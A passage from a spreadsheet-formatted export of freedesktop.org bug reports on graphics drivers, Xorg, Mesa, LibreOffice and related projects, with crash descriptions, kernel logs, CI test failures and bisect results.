2. Set timeout for screen saver 1-15 minutes doesn't matter.
3. From a remote ssh session monitor via top and observe one cpu at ~100% when screen save activates.
Actual Results:  
I ran the following perf command to capture some data which will add as an attachment
perf record -F 250 -g -a sleep 10
perf report
Expected Results:  
Not consume cpu when idle/screensaver mode.
Attachment includes
20-amdgpu.conf dmidecode.txt perf_data_summary.txt 4.8.rc3.perf.data os-release and Xorg.0.log</t>
  </si>
  <si>
    <t>malcolmlewis</t>
  </si>
  <si>
    <t>MESA-104416</t>
  </si>
  <si>
    <t>[skl] GPU HANG: ecode 9:0:0x85dffffb in Bastion</t>
  </si>
  <si>
    <t>Created attachment 136450
/sys/class/drm/card0/error
mesa 17.3.1-2
Bastion (steam) crashes after selecting the story entry in the game menu (the loading screen freezes).
Does not crash with the antialiasing 2x option set.</t>
  </si>
  <si>
    <t>mateusz.macieja8</t>
  </si>
  <si>
    <t>LIBREOFFICE-79834</t>
  </si>
  <si>
    <t>[FILEOPEN] SVG Insert-&gt;From File takes 2+ time longer in 4.3</t>
  </si>
  <si>
    <t>Created attachment 100729
Sample SVG
LO 4.3 beta2 takes 2+ times more to open the attached SVG comparing to LO 4.2.</t>
  </si>
  <si>
    <t>XORG-99992</t>
  </si>
  <si>
    <t>test/test-bezier.c dumps core on arm64/ppc/ppc64el</t>
  </si>
  <si>
    <t>Created attachment 129969
build log on ppc
Hi 0.24.0 added a new test for wacom but running it fails on (at least) these archs. Build log attached.</t>
  </si>
  <si>
    <t>UDISKS-24499</t>
  </si>
  <si>
    <t>media players have USB drive icon</t>
  </si>
  <si>
    <t>Right now media players (as defined by media-player-info) don't get any presentation icon assigned in DK-D which causes them to just get the standard USB drive icon in GNOME.
I'll attach a patch to fix this.</t>
  </si>
  <si>
    <t>LIBREOFFICE-36013</t>
  </si>
  <si>
    <t>Writer crashes when on documents that contains &gt;=2^16 style changes</t>
  </si>
  <si>
    <t>I open the document and when I close it I consistently get a Writer crash. The
sample document that causes the crash can be found here http://dict.linux.org.ua/other/sheludko.odt
The document has several styles which alternate frequently.
On (even) bigger documents I get crash when changing style properties or even when opening the document.
This is the same problem as https://openoffice.org/bugzilla/show_bug.cgi?id=84159 which was fixed in ooo dev-3.4. The problem though it was fixed quite inefficiently: the large document (2k-3k pages) I am working with took several minutes to open and almost 10 min to save on modern laptop in ooo &lt;= 3.3. But in ooo dev-3.4 it took ~40min to open and it took almost 3 hours to save. Even closing the document in ooo dev-3.4 takes at least half an hour. So even though the crash is fixed this solution makes the office unusable for such documents.
It would be nice if this crash could be fixed but in more efficient way.</t>
  </si>
  <si>
    <t>MESA-107212</t>
  </si>
  <si>
    <t>Dual-Core CPU E5500 / G45: RetroArch with reicast core results in corrupted graphics</t>
  </si>
  <si>
    <t>Created attachment 140615
Reicast with bad graphics on g45
Running RetroArch with the Reicast core (Sega Dreamcast emulator) ends up displaying corrupted graphics (see the attached screenshot).
I am running this emulator with its OpenGL 2 context it also has a GL3 one. The reason I'm using GL2 over 3 is that my GPU does not support GL3.
My GPU:
[diego@dualcore ~]$ lspci | grep VGA
00:02.0 VGA compatible controller: Intel Corporation 4 Series Chipset Integrated Graphics Controller (rev 03)
[diego@dualcore ~]$ 
I'm on Arch Linux both RA and Reicast are compiled from git.
Thanks.</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-30572</t>
  </si>
  <si>
    <t>Add Sony Ericsson K610i</t>
  </si>
  <si>
    <t>Created attachment 39123
Patch adding Sony Ericsson K610i
See attached patch</t>
  </si>
  <si>
    <t>MESA-27654</t>
  </si>
  <si>
    <t>Remote opengl from Linux client to OSX server fails using LIBGL_ALWAYS_INDIRECT</t>
  </si>
  <si>
    <t>Created attachment 35046
glxinfo.txt
I use Xquartz on an OSX box remote ssh in to a Linux FC12 system.
historically it's been necessary to use LIBGL_ALWAYS_INDIRECT this is the
only config that gives sane glxinfo (see attached)
On the remote linux system mesa is 7.7-3:
% rpm -qa|grep mesa
mesa-libGL-devel-7.7-3.fc12.x86_64
mesa-libGLU-7.7-3.fc12.i686
mesa-libGLU-7.7-3.fc12.x86_64
mesa-libGLU-devel-7.7-3.fc12.x86_64
mesa-dri-drivers-7.7-3.fc12.x86_64
mesa-dri-drivers-7.7-3.fc12.i686
mesa-libGL-7.7-3.fc12.i686
mesa-libGL-7.7-3.fc12.x86_64
From the OSX box running Xquartz 2.5.0:
% setenv LIBGL_ALWAYS_INDIRECT 1
%  glxgears
X Error of failed request:  BadAlloc (insufficient resources for operation)
  Major opcode of failed request:  147 (GLX)
  Minor opcode of failed request:  3 (X_GLXCreateContext)
  Serial number of failed request:  22
  Current serial number in output stream:  24
All remote openGL applications fail similarly - a window appears briefly then dies.
Apple's Jeremy Huddleston thinks it's a bug in remote mesa.</t>
  </si>
  <si>
    <t>James.Gunning</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-78750</t>
  </si>
  <si>
    <t>Request for new account for mesa development</t>
  </si>
  <si>
    <t>Created attachment 99109
SSH Public Key
I'd prefer the username jekstrand if possible.</t>
  </si>
  <si>
    <t>DRI-93119</t>
  </si>
  <si>
    <t>[BAT IGT HSW BDW SKL] has_infoframe pipe config mismatch</t>
  </si>
  <si>
    <t>There's a lot of BAT CI noise that complains about has_infoframes mismatches like this:
[  108.012862] [drm:intel_pipe_config_compare [i915]] *ERROR* mismatch in has_infoframe (expected 1 found 0)
[  108.012866] ------------[ cut here ]------------
[  108.012880] WARNING: CPU: 2 PID: 5925 at drivers/gpu/drm/i915/intel_display.c:12873 intel_atomic_commit+0x120c/0x1810 [i915]()
[  108.012881] pipe state doesn't match!
I suspect it's all the same bug on all machines since the high-level infoframe logic is shared and only hsw/bdw seem to be affected.</t>
  </si>
  <si>
    <t>MESA-48382</t>
  </si>
  <si>
    <t>weird rendering distortions on R200M</t>
  </si>
  <si>
    <t>Created attachment 59582
Xonotic distortion
Here are my specs:
ATI Radeon X200M (RS482)
AMD Turion 64
X.Org X11 7.4-r1 
Xorg Server- 1.11.2-r2
Mesa 7.11.2
Linux Kernel 3.2.12
I get these strange distortions in xonotic(screenie attached). This vertex distortion also occurs in wings3D and blender.</t>
  </si>
  <si>
    <t>mdskpr</t>
  </si>
  <si>
    <t>DRI-110190</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@kms_plane@pixel-format-pipe-a-planes* - fail - First failure is WARNING: CRC mismatch with format YUYV(0x56595559) on A.6</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5768/shard-iclb8/igt@kms_plane@pixel-format-pipe-a-planes-source-clamping.html
Starting subtest: pixel-format-pipe-A-planes-source-clamping
(kms_plane:7227) WARNING: CRC mismatch with format YUYV(0x56595559) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format YUYV(0x56595559) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format YVYU(0x55595659) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format YVYU(0x55595659) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format UYVY(0x59565955) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format UYVY(0x59565955) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format VYUY(0x59555956) on A.6
(kms_plane:7227) WARNING: CRC mismatch with format VYUY(0x59555956) on A.6
(kms_plane:7227) CRITICAL: Test assertion failure function test_pixel_formats file ../tests/kms_plane.c:612:
(kms_plane:7227) CRITICAL: Failed assertion: result
(kms_plane:7227) CRITICAL: At least one CRC mismatch happened</t>
  </si>
  <si>
    <t>PIGLIT-108612</t>
  </si>
  <si>
    <t>The spec@arb_program_interface_query@arb_program_interface_query-getprogramresourceiv fails</t>
  </si>
  <si>
    <t>I guess this piglit test fails because we require a valid location for TCS output which is declared without layout (location=X)
but according to spec:
Not all active variables are assigned valid locations the
 following variables will have an effective location of -1:
      * uniforms declared as atomic counters
      * members of a uniform block
      * built-in inputs outputs and uniforms (starting with gl_) and
      * inputs or outputs not declared with a location layout qualifier
        except for vertex shader inputs and fragment shader outputs.
I will provide the possible solution shortly.</t>
  </si>
  <si>
    <t>LIBREOFFICE-57369</t>
  </si>
  <si>
    <t>: MS Word document imported with broken numbering fields</t>
  </si>
  <si>
    <t>Created attachment 70367
Document saved in MS Word 2007 with a proof of a problem.
Problem description:
Opening a document created in MS Word fields are broken.
Instead of 1. it shows 10.
I will attach the document with all private information removed. Strangely enough in this version of a document contents is also displayed differently then in MS Word (where I stripped data from a document).</t>
  </si>
  <si>
    <t>okrylov</t>
  </si>
  <si>
    <t>XORG-15824</t>
  </si>
  <si>
    <t>Radeon lockup when another window is moved over Xv [TexturedVideo] window</t>
  </si>
  <si>
    <t>When moving a window over an Xv window (such as mplayer) occasionally the system freezes. I've been able to reproduce this consistently.
Test setup: ThinkPad T60p (FireGL V5200) 1600x1200 LCD with 1600x1200 CRT on the left of the LCD.
1. Start mplayer fullscreen on the CRT.
2. Start OpenOffice or another program with a large window.
3. Drag the window on top of mplayer and then drag it off of mplayer.
Sound will continue playing but everything else will be unresponsive. The mouse pointer may continue moving but it's slow and jerky.
Using radeon git: 24b60c8965f6a0b3f0c2bb1e7236b4d6642c5918
Using xorg-server: 1.4.0.90-r3 (Gentoo)</t>
  </si>
  <si>
    <t>gerbilsoft</t>
  </si>
  <si>
    <t>PORTLAND-91758</t>
  </si>
  <si>
    <t>xdg-icon-resource does not support filenames with spaces</t>
  </si>
  <si>
    <t>This is similar to bug #66605 but for xdg-icon-resource this time and has the same cause: unquoted var expansions.
Example:
~ $ xdg-icon-resource install --novendor --size 48 ./foo bar.png foobar
/usr/bin/xdg-icon-resource: 790: [: /home/xxx/foo: unexpected operator
A real scenario is installing icons from software zip/tarballs where the icon file is in a data dir deep down the archive tree and paths can not be renamed as the binary executable might have the path to this data dir hardcoded.
A workaround is to copy the icon to a temp dir before using xdg-icon-resource.
The unquoted var to fix this particular case is $icon_icon_file at line 397 of xdg-icon-resource.in ( http://cgit.freedesktop.org/xdg/xdg-utils/tree/scripts/xdg-icon-resource.in#n397 ) (line 790 in 1.0.2 953 in 1.1.0 rc3) but there are several other unquoted var occurrences in code that might also cause trouble.
I'll post 2 patches one fixing this critical occurrence only and another one quoting other vars I've spotted to minimize future issues.</t>
  </si>
  <si>
    <t>DRI-102254</t>
  </si>
  <si>
    <t>[CI] igt@perf@oa-exponents fails</t>
  </si>
  <si>
    <t>The test igt@perf@oa-exponents hits the following assert:
(perf:1635) CRITICAL: Test assertion failure function read_2_oa_reports file perf.c:1201:
(perf:1635) CRITICAL: Failed assertion: !reached
Full logs: https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_2968/shard-hsw5/igt@perf@oa-exponents.html</t>
  </si>
  <si>
    <t>POLICYKIT-40859</t>
  </si>
  <si>
    <t>man: Fix pkaction man page wrt to  --action-id option</t>
  </si>
  <si>
    <t>Bug-Debian: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=641527</t>
  </si>
  <si>
    <t>DRI-19552</t>
  </si>
  <si>
    <t>[KMS]kernel modesetting oddities</t>
  </si>
  <si>
    <t>Created attachment 21975
Kernel warnings after modprobe-ing i915
When using the Intel driver (2.6 branch as of 2009/01/13) with kernel modesetting (2.6.29-rc1) enabled 4 oddities happen:
1. When loading the i915 kernel module I get a load of kernel warnings and the kernel is tainted (GW). The messages are attached to this bug.
2. When the X server starts the mouse cursor appears in the horizontal center of the screen but vertically quite a bit below the center.
3. KDE 4.2's splash screen appears only in the upper left quarter of the screen instead of being centered
4. KDE 4.2's system tray icons are larger than they're supposed to be.
2. 3. and 4. probably all have a common reason (e.g. wrong DPI reported or X/Y resolution reported incorrectly during startup and reported correctly later?).
Without kernel modesetting everything behaves as expected.</t>
  </si>
  <si>
    <t>POPPLER-48468</t>
  </si>
  <si>
    <t>cairo pattern stroke with transparency is broken</t>
  </si>
  <si>
    <t>Created attachment 59680
test case
Pattern strokes where the pattern is a transparency group does not work. See the attached test case.</t>
  </si>
  <si>
    <t>XORG-12725</t>
  </si>
  <si>
    <t>libXcomposite fails to build from git without xmlto</t>
  </si>
  <si>
    <t>libXcomposite finds that xmlto is missing and warns about this but still tries to build the man page. consequently the build fails.</t>
  </si>
  <si>
    <t>LIBREOFFICE-56583</t>
  </si>
  <si>
    <t>Impress crashes when presentation starts (dual-head no Xinerama)</t>
  </si>
  <si>
    <t>Created attachment 69308
Xorg config
On a system with a nVidia graphics card nouveau driver two monitors Impress crashes without message as soon as a presentation is started (e.g. [F5]).
The video setup does have Xinerama disabled in /etc/X11/xorg.conf.
When Xinerama is enabled Impress does not crash.
A wild guess is that Impress performs a Xinerama specific call regardless whether Xinerama is available.
System details: Fedora 17 x86_64 all updates as of today.
NVidia GeForce 7600 GS graphics card.
X.Org X Server 1.12.3 + nouveau driver 0.0.16.
LibreOffice 3.5.x and 3.6.x.
Note: When LibreOffice is started from the command line it shows Xlib:  extension XINERAMA missing on display :0..</t>
  </si>
  <si>
    <t>jvromans</t>
  </si>
  <si>
    <t>POPPLER-71835</t>
  </si>
  <si>
    <t>Defect PDF forces pdftoppm into an endless loop when reconstruct XRef (under windows only)</t>
  </si>
  <si>
    <t>Created attachment 89529
the defect PDF
The attached PDF forces pdftoppm to run into an endless loop when trying to reconstruct XRef table. Reason for it is the windows version of GooFile::read which returns -1 when trying to read after EOF but the calling FileStream::fillBuf() doesn't check for -1.</t>
  </si>
  <si>
    <t>XORG-8269</t>
  </si>
  <si>
    <t>vesa fbtile segmentation fault on i82815 chipset</t>
  </si>
  <si>
    <t>On a DELL Inspiron 2500 (i810 driver Intel 82815 chipset) running Gentoo
2006.0 and trying out Xorg 7.1.1 (because 7.0.0 broke what works under 6.8.0).
I get the following crash when using the VESA driver.
(WW) Couldn't load XKB keymap falling back to pre-XKB keymap
(II) PS2Maus: ps2EnableDataReporting: succeeded
Could not init font path element /usr/share/fonts/TTF removing from list!
Backtrace:
0: X(xf86SigHandler+0x84) [0x80c6c34]
1: [0xffffe420]
2: /usr/lib/xorg/modules/libfb.so(fbTile+0x167) [0xb7b53bb7]
3: /usr/lib/xorg/modules/libfb.so(fbFillRegionTiled+0x192) [0xb7b54a52]
4: /usr/lib/xorg/modules/libfb.so(fbPaintWindow+0x8d) [0xb7b54b2d]
5: X [0x81584bc]
6: X(miWindowExposures+0xeb) [0x810ae9b]
7: X(MapWindow+0x1ba) [0x807429a]
8: X(InitRootWindow+0xc7) [0x80745e7]
9: X(main+0x441) [0x806e4e1]
10: /lib/tls/libc.so.6(__libc_start_main+0xd4) [0xb7ca9f14]
11: X(FontFileCompleteXLFD+0x89) [0x806da51]
Fatal server error:
Caught signal 11.  Server aborting
Attached are Xorg.0.log xorg.conf lshw and lspci -vv outputs.</t>
  </si>
  <si>
    <t>s.egbert</t>
  </si>
  <si>
    <t>DRI-81701</t>
  </si>
  <si>
    <t>[BDW Regression]igt/gem_reset_stats some subcases cause [drm:hsw_unclaimed_reg_detect] *ERROR* Unclaimed register detected. Please use the i915.mmio_debug=1 to debug this problem.</t>
  </si>
  <si>
    <t>Created attachment 103380
dmesg
==System Environment==
--------------------------
Regression: Yes
Good commit on -next-queued: 91565c85b66db820f01894a971d39aaef60c4325
Non-working platforms: BDW
==kernel==
--------------------------
origin/drm-intel-nightly: af1aaba219fdd90ca1b30f9b8d8d19352224f170(fails)
    drm-intel-nightly: 2014y-07m-23d-20h-15m-10s integration manifest
origin/drm-intel-next-queued: 2b8ee5710915a244b807fbe3427299d007d19e89(fails)
    drm/i915: Allow overlapping userptr objects  
origin/drm-intel-fixes: eedd10f45bdcb2a5b2afa35f845e080c3bc984f2(works)
    drm/i915: Simplify i915_gem_release_all_mmaps()
==Bug detailed description==
-----------------------------
igt/gem_reset_stats some subcases cause [drm:hsw_unclaimed_reg_detect] *ERROR* Unclaimed register detected. Please use the i915.mmio_debug=1 to debug this problem.
Output:
root@x-bdw05:/GFX/Test/Intel_gpu_tools/intel-gpu-tools/tests# ./gem_reset_stats --run-subtest reset-stats-ctx-render
IGT-Version: 1.7-g70e6ed9 (x86_64) (Linux: 3.16.0-rc4_drm-intel-next-queued_2b8ee5_20140724_debug+ x86_64)
Subtest reset-stats-ctx-render: SUCCESS
root@x-bdw05:/GFX/Test/Intel_gpu_tools/intel-gpu-tools/tests# dmesg -r|egrep |grep drm
[  169.278194] [drm:hsw_unclaimed_reg_detect] *ERROR* Unclaimed register detected. Please use the i915.mmio_debug=1 to debug this problem.
[  175.277357] [drm:hsw_unclaimed_reg_detect] *ERROR* Unclaimed register detected. Please use the i915.mmio_debug=1 to debug this problem.
[  175.278108] [drm:i915_context_is_banned] *ERROR* gpu hanging too fast banning!
[  181.280352] [drm:hsw_unclaimed_reg_detect] *ERROR* Unclaimed register detected. Please use the i915.mmio_debug=1 to debug this problem.
[  181.280605] [drm:i915_context_is_banned] *ERROR* gpu hanging too fast banning!
Reproduce steps:
-------------------------
1. ./gem_reset_stats --run-subtest reset-stats-ctx-render</t>
  </si>
  <si>
    <t>XORG-64904</t>
  </si>
  <si>
    <t>[BISECTED] nouveau nv50: External VGA not detected anymore</t>
  </si>
  <si>
    <t>I have a lenove thinkpad T61p with a NVIDIA Corporation G84GLM [Quadro FX
570M].
When connecting my external VGA monitor my monitor is no more detected
properly:
&gt; cat /sys/class/drm/card0-VGA-1/status
gives now disconnected
I bisected the kernel sources from git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
and filed a bug report at https://bugzilla.kernel.org (https://bugzilla.kernel.org/show_bug.cgi?id=58021).
Last good commit is
ef22c8bb7b3fac45919b7fde412d36d1a8367d51
drm/nv50/disp: call into core to handle dac/sor power state changes
First bad commit is
7ebb38b556485449bfaa506a196439f6a6fd6ebd
drm/nv50/disp: call into core for dac load detection
The responsible function is
nv50_dac_detect in drivers/gpu/drm/nouveau/nv50_dac.c (moved to
drivers/gpu/drm/nouveau/nv50_display.c in more recent kernels).
Also tried a 3.9.1 kernel. The problem still remains.
However replacing nv50_dac_detect with the corresponding version from the last
good commit fixed the problem (tried with a 3.8.10 and a 3.8.13 kernel).</t>
  </si>
  <si>
    <t>wippbox</t>
  </si>
  <si>
    <t>MESA-66836</t>
  </si>
  <si>
    <t>[r600g] WoW is crashing with HD6450</t>
  </si>
  <si>
    <t>WoW has started crashing with my Hd6450. A git bisect pinpoints this commit:
862f69fbe1e54e0e9a3c439450a14f0319648b60 is the first bad commit
commit 862f69fbe1e54e0e9a3c439450a14f0319648b60
Author: Marek OlÅ¡Ã¡k 
Date:   Sun Jun 30 14:57:17 2013 +0200
    r600g: don't call buffer_wait in buffer_mmap_sync_with_rings
    The winsys should do this because it measures how much time we spend
    in buffer_map doing synchronization which can be viewed with the gallium
    HUD.
    Reviewed-by: Alex Deucher 
:040000 040000 7443defc91af969379873fc85698e78cc0731b12 9a18818193c561b6aff233efc290f7655924cbd1 M	src
WoW's own crash dump analysis is attached but the relevant part appears to be:
--- Thread ID: 74 [Current Thread] ---
00007FEEB939E2AD              radeon_get_reloc+45 (0000000000000000000000000000000000000000000000000000000000000000)
00007FEEB939D6C7              radeon_bo_map+551 (0000000000000000000000000000000000000000000000000000000000000000)
00007FEEB933C89B              r600_buffer_transfer_map+107 (0000000000000000000000000000000000000000000000000000000000000000)
00007FEEB917A0D7              st_bufferobj_get_subdata+119 (0000000000000000000
(It turns out that I was running WoW in DXD9 mode rather than OpenGL mode but it still shouldn't have crashed.)</t>
  </si>
  <si>
    <t>LIBREOFFICE-44717</t>
  </si>
  <si>
    <t>Inaccurate 'Please exit' wording in Installation Wizard</t>
  </si>
  <si>
    <t>When installing LibO 3.5.0 Beta 2 I saw the message 'Please exit LOdev 3.5 and the LOdev 3.5 Quickstarter before you continue ...' although I have never installed any version of LibO on this computer. Presumably it was really referring to the fact that OOo was running. It seems that the message should not refer to a specific version of LibO and should accommodate the possibility that it's OOo that needs to be closed.</t>
  </si>
  <si>
    <t>robert.funnell</t>
  </si>
  <si>
    <t>GSTREAMER-25077</t>
  </si>
  <si>
    <t>New account</t>
  </si>
  <si>
    <t>Created attachment 31176
GPG key
Real name: Robert Swain
E-mail address: robert.swain@gmail.com
Account name: robswain</t>
  </si>
  <si>
    <t>robert.swain</t>
  </si>
  <si>
    <t>PULSEAUDIO-69331</t>
  </si>
  <si>
    <t>[PATCH] POTFILES.in is out of date</t>
  </si>
  <si>
    <t>Created attachment 85783
i18n: sort POTFILES.in alphabetically
There are files that should be in po/POTFILES.in and intltool complains that they are not. The first patch sorts POTFILES.in alphabetically while the other adds the missing files on top of it.</t>
  </si>
  <si>
    <t>GEOCLUE-75446</t>
  </si>
  <si>
    <t>service</t>
  </si>
  <si>
    <t>DBus policy errors</t>
  </si>
  <si>
    <t>In current geoclue master there are a number of DBus policy errors:
1) The Agent configuration allows DBus.Properties for the default context thus allowing any message on that interface from any user to any destination. This is wrong and only the geoclue user should be allowed that.
2) geoclue is not allowed to talk to NetworkManager (which only allows logged in users). This is not a problem is geoclue is running as root but if it's running as geoclue the call fails with
feb 24 15:27:16 giovanni-laptop geoclue[11378]: ** (geoclue:11378): WARNING **: Could not initialize NMClient /org/freedesktop/NetworkManager: Rejected send message 3 matched rules type=method_call sender=:1.637 (uid=984 pid=11378 comm=/opt/gnome/libexec/geoclue -t 5 ) interface=org.freedesktop.NetworkManager member=GetPermissions error name=(unset) requested_reply=0 destination=org.freedesktop.NetworkManager (uid=0 pid=11404 comm=/usr/sbin/NetworkManager --no-daemon )
(and similar for GetSettings etc)
Immediately after geoclue crashes because nm_client_new() returns NULL.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-16448</t>
  </si>
  <si>
    <t>Tajik keyboard layout: put 'Ñ‰' in place of the letter 'o' for Russian words</t>
  </si>
  <si>
    <t>I'm reporting this for a Ubuntu user:
The original Tajik keyboard layout was based on using the letter 'o' for
making the extra letters. For example: typing o and then x produces Tajik h.
In the current system the letter o doesn't do anything but the Tajik
letters can be made by using RightAlt. For example RightAlt + o produces
Tajik h.
The 'o' on the keyboard is dead and does not have any function. In
Russian (the Tajik keyboard is based on the Russian keyboard) the 'o'
produces the 'Ñ‰'.
Because Russian words are often used in Tajik I would suggest putting
the 'Ñ‰' back in place of the letter 'o' so that the one keyboard layout
can be used for typing Tajik and Russian.
then
I changed the file usr/share/X11/xkb/symbols/tj so that the AD09 key is
no longer dead but produces cyrillic_shcha. The changed file is
attached. When using this it is possible to type all Tajik and Russian
words on the tj keyboard without having a dead key.
See https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-keyboard/+bug/67051/comments/7 for proposed solution</t>
  </si>
  <si>
    <t>jeanbaptiste.lallement</t>
  </si>
  <si>
    <t>DRI-42010</t>
  </si>
  <si>
    <t>[IVB] [3pipe] When running a fullscreen 3d app in 3pipe mode all 3 pipes lose signal</t>
  </si>
  <si>
    <t>When running a fullscreen 3d app in 3-pipe mode (tested with openarena and nexuiz) all 3 pipes lose sync.
When switching to console the output is working. And when switching back to vt7 the screen graphical content is present for a fraction of time and then loses sync as well.
Nothing apparently suspicious in dmesg with drm.debug=0x04.</t>
  </si>
  <si>
    <t>XORG-23141</t>
  </si>
  <si>
    <t>Brightness control does not work by using xbacklight due to KMS (Samsung N130)</t>
  </si>
  <si>
    <t>This is about Novell Bug #523795/527533
https://bugzilla.novell.com/show_bug.cgi?id=523795
https://bugzilla.novell.com/show_bug.cgi?id=527533
https://bugzilla.novell.com/show_bug.cgi?id=523795#c40
Comment #40 From  Jesse Barnes   2009-07-27 10:25:59 MDT 
Ah so it sounds like only the legacy method will work on this platform... We
don't support that in KMS yet but it should be a fairly easy addition.  You
can file an RFE at bugs.freedesktop.org if you want I'll add it to my TODO
list.</t>
  </si>
  <si>
    <t>WAYLAND-97195</t>
  </si>
  <si>
    <t>Ignore modifier key combinations during DWT</t>
  </si>
  <si>
    <t>see syndaemon -K and the recent patch discussion here:
https://lists.freedesktop.org/archives/xorg-devel/2016-August/050538.html
this should be used by default in libinput over the current syndaemon -k behaviour.</t>
  </si>
  <si>
    <t>XORG-10177</t>
  </si>
  <si>
    <t>radeon driver does not detect attached TV (dual head clone configuration on 9250)</t>
  </si>
  <si>
    <t>I can see boot process on my TV because videocard's BIOS detects TV but as soon as Xorg changes resolution to 1280x960 on my monitor TV goes out of sync.
Xorg.0.log says it didn't detect secondary monitor (and I guess that's why it ignores Hsync &amp; Vrefresh settings).
See attached xorg.conf &amp; Xorg.0.log.</t>
  </si>
  <si>
    <t>nyyr1</t>
  </si>
  <si>
    <t>LIBREOFFICE-33453</t>
  </si>
  <si>
    <t>Typograpy extension not work in system wide location</t>
  </si>
  <si>
    <t>Typograpy toolbar extension is not work if it's installed into the system wide extensions directory: /usr/lib/libreoffice/share/extensions. It worked in one of the previous RC but it's not in RC4 (3.3.0.4).
I tried two verisons of typograpy toolbar:
- Version 0.3 not shown in Extension Manager at all.
- Version 0.4.2 shown in there but still not work I can't enable it from toolbars menu.
Both versions vork if I installed them as a user.</t>
  </si>
  <si>
    <t>ballogyor</t>
  </si>
  <si>
    <t>DRI-76050</t>
  </si>
  <si>
    <t>[PNV]igt/gem_persistent_relocs/forked-interruptible-faulting-reloc-thrash-inactive randomly causes system hang</t>
  </si>
  <si>
    <t>Created attachment 95634
dmesg(error)
System Environment:
--------------------------
Platform: Pieview
kernel:   drm-intel-next-queued/e8e6e6012d68c4967e8f26fdd39ac95c247d4789
Bug detailed description:
---------------------------
It randomly causes system hang on Pinevuew with -nightly or -queued kernel. It happens 1 in 5 runs.
It also randomly has [drm:i915_reset] *ERROR* Failed to reset chip: -19.
output(hang):
IGT-Version: 1.5-g20087e7 (i686) (Linux: 3.14.0-rc6_drm-intel-next-queued_e8e6e6_20140311+ i686)
dmesg(hang):
[   48.431468] console [netcon0] enabled
[   48.431589] netconsole: network logging started
[   48.437292] console [netcon0] disabled
[   48.446037] netpoll: netconsole: local port 6665
[   48.446184] netpoll: netconsole: local IPv4 address 0.0.0.0
[   48.446343] netpoll: netconsole: interface 'enp2s0'
[   48.446485] netpoll: netconsole: remote port 6666
[   48.446622] netpoll: netconsole: remote IPv4 address 10.239.47.171
[   48.446798] netpoll: netconsole: remote ethernet address 74:d0:2b:95:69:65
[   48.446985] netpoll: netconsole: local IP 10.239.47.176
[   48.448644] console [netcon0] enabled
[   48.448767] netconsole: network logging started
[   55.945098] [drm:i915_gem_open]
[   55.945248] [drm:intel_crtc_cursor_set] cursor off
[   55.945354] [drm:intel_crtc_set_config] [CRTC:3] [NOFB]
[   55.945474] [drm:intel_set_config_compute_mode_changes] computed changes for [CRTC:3] mode_changed=0 fb_changed=0
[   55.945680] [drm:intel_modeset_stage_output_state] [CONNECTOR:5:LVDS-1] to [CRTC:4]
[   55.945841] [drm:intel_crtc_cursor_set] cursor off
[   55.945945] [drm:intel_crtc_set_config] [CRTC:4] [FB:14] #connectors=1 (x y) (0 0)
[   55.946151] [drm:intel_set_config_compute_mode_changes] computed changes for [CRTC:4] mode_changed=0 fb_changed=0
[   55.949340] [drm:intel_modeset_stage_output_state] [CONNECTOR:5:LVDS-1] to [CRTC:4]
[   55.952422] [drm:i915_gem_open]
[   63.707022] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... render ring idle
[  133.707023] [drm] no progress on render ring
[  133.716255] [drm] GPU HANG: ecode -1:0x00000000 reason: Ring hung action: reset
[  133.720785] [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
[  133.725398] [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
[  133.730065] [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
[  133.734848] [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
[  133.739694] [drm] GPU crash dump saved to /sys/class/drm/card0/error
[  157.002008] INFO: rcu_sched detected stalls on CPUs/tasks: {} (detected by 1 t=60002 jiffies g=4000 c=3999 q=54)
[  157.002008] INFO: Stall ended before state dump start
output(error):
IGT-Version: 1.5-g20087e7 (i686) (Linux: 3.14.0-rc6_drm-intel-next-queued_e8e6e6_20140311+ i686)
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 5 Input/output error
Failed assertion: ret == 0
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 5 Input/output error
Failed assertion: ret == 0
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 5 Input/output error
Failed assertion: ret == 0
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 5 Input/output error
Failed assertion: ret == 0
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 5 Input/output error
Failed assertion: ret == 0
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 22 Invalid argument
Failed assertion: ret == 0
Test assertion failure function gem_execbuf file drmtest.c:581:
Test assertion failure function gem_execbuf file drmtest.c:581:
Last errno: 5 Input/output error
Failed assertion: ret == 0
Last errno: 5 Input/output error
Failed assertion: ret == 0
child 0 failed with exit status 99
Subtest forked-interruptible-faulting-reloc-thrash-inactive: FAIL
gem_reloc_vs_gpu: drmtest.c:1296: children_exit_handler: Assertion `ret == 0' failed.
Aborted (core dumped)
Reproduce steps:
-------------------------
1. ./gem_reloc_vs_gpu --run-subtest forked-interruptible-faulting-reloc-thrash-inactive</t>
  </si>
  <si>
    <t>DRI-57825</t>
  </si>
  <si>
    <t>[HSW] I-G-T/gem_ringfill/render fail due to broken rendercpy function</t>
  </si>
  <si>
    <t>Created attachment 70947
gem_ringfill failed dmesg
Environment:
------------------------------
The Linux Kernel the operating system core itself
Kernel: (drm-intel-next-queued)42dcedd4f2e715dc0313e359c8288e6397843fff
Some additional commit info:
Author: Chris Wilson 
Date:   Thu Nov 15 11:32:30 2012 +0000
Console print:
------------------------------
filling blt ring: 100%
verifying
filling render ring: 100%
verifying
